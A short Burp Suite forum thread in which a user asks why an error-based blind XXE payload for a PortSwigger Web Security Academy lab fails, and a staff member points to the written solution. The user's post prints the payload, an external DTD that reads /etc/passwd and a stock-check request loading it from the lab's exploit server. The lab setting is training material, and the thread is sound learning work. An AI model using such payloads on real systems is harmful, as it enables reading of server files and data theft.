Burp Suite User Forum

Create new post

Not able to complete - https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages

Shreenivas | Last updated: Feb 17, 2023 07:18PM UTC

Hello, I get the below error. "XML parser exited with error: org.xml.sax.SAXParseException; lineNumber: 1; columnNumber: 108; Premature end of file." Here are my payloads. Exploit server: <!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>"> POST /product/stock <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0aa90096041d3934c306397401aa007e.exploit-server.net/exploit.dtd"> %eval; %exfil; %xxe;]><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck> I have changed the endpoint to exploit.dtd

Ben, PortSwigger Agent | Last updated: Feb 20, 2023 09:43AM UTC

Hi Shreenivas, Have you tried following the written solution?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.